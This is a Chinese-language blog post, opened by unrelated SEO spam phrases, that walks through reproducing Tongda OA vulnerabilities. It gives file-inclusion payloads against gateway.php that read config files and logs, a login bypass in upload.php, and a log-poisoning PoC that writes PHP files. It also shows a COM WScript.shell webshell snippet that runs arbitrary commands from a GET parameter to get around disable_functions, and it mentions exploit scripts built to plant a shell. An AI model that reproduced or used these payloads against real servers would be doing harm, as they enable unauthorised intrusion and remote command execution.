做网站购买域名之后,徐州免费网站建站模板,房产管理局官网入口,郑州网站建设推广说明通达OA漏洞在去年上半年已爆出#xff0c;这不趁着周末没事做#xff0c;将源码下载下来进行复现学习。文件包含测试文件包含检测#xff0c;payload1:ip/ispirit/interface/gateway.php?json{url:/general/../../mysql5/my.ini}利用文件包含访…说明通达OA漏洞在去年上半年已爆出这不趁着周末没事做将源码下载下来进行复现学习。文件包含测试文件包含检测payload1:ip/ispirit/interface/gateway.php?json{url:/general/../../mysql5/my.ini}利用文件包含访问mysql.ini,检查是否有某些特定字符串 比如innodb_log_group_home_dirpayload2:ip/ispirit/interface/gateway.php?json{}url/general/../../nginx/logs/oa.access.log利用文件包含访问OA日志复现源码下载链接https://pan.baidu.com/s/1HP5pDsAK2QLOWpnB1JX-Yg提取码vab0是个exe安装解压完是php代码。用Sublime打开都是16进制加密用notepad打开显示zend加密php在线解密网站:http://dezend.qiling.org/free.html解密出源代码。文件上传ispirit/im/upload.php要上传首先需要绕过登陆验证在本系统中auth.php是登陆验证的相关逻辑但在upload.php未修复前如果$P非空就不需要经过auth.php验证即可执行后续代码。利用此处逻辑漏洞可绕过登陆验证直接上传文件。经过下载源码测试上传后的文件在MYOA/attach/im/2003/目录下。因上传后的文件不在根目录所以无法直接利用因此需要进行文件包含。文件包含与上传相反这里不传P参数就可以文件包含。未修复前可通过精心构造json进入47行的includ_once进行文件包含。官方在补丁中过滤了 防止用户读取其他目录文件。POCpoc有很多其一首先构造url并访问在日志中写入一句话原理是OA默认会将访问urlagent写日志。/ispirit/interface/gateway.php?json{}a?php file_put_contents(1.php,hello123);?先在浏览器访问发现用burp重新发包。成功写入日志。(写日志的方式省去了上传)文件包含如果php poc 为?php file_put_contents(1.php,hello123);?则上传到 存在漏洞文件 gateway.php 同级目录如果php poc为?php file_put_contents(../1.php,hello123);?,则上传到 上一级目录 ispirit 目录下。注意路径。exp通过 upload.php 上传一个文件可自定义后缀名。经过下载源码测试上传后的文件在MYOA/attach/im/2003/目录下。思路一上传一个写shell的php文件在利用文件包含写shell。具体见exp.py。思路二执行cmd,MYOA/bin/ 目录下的 php.ini 禁用了一些执行命令的函数。disable_functions exec,shell_exec,system,passthru,proc_open,show_source,phpinfodisable_classes 参考使用com组件绕过disable_functionshttps://www.cnblogs.com/-qing-/p/10944118.htmleg:?php $command$_GET[a];$wsh new COM(WScript.shell); // 生成一个COM对象 Shell.Application也能$exec $wsh-exec(cmd /c.$command); //调用对象方法来执行命令$stdout $exec-StdOut();$stroutput $stdout-ReadAll();echo $stroutput;?这里写的exp总是将post数据自动url编码。达不到burp的效果。需要先设置一次请求头setHeader(Content-Type, application/x-www-form-urlencoded)再将数据拼接成string格式再进行发送 终于写成了exp2.py。版本路径不同环境路径不同。例如2013/ispirit/im/upload.php/ispirit/interface/gateway.php例如2017/ispirit/im/upload.php/mac/gateway.php后记一些趣事正常该用post包含的。get包含就很玄学了。正常get请求(不空行)是不行的,在浏览器GET请求也是不能包含的。注意看我光标位置。必须空出来一行否则不成功。get无请求体不知道是什么原因。空两行试试发包Content-Length都有了可真牛啊。wireshark抓个包,get没请求体呀。见strange-get-include.pcap。往期精彩感兴趣的可以点个关注 关注「安全先师」把握前沿安全脉搏
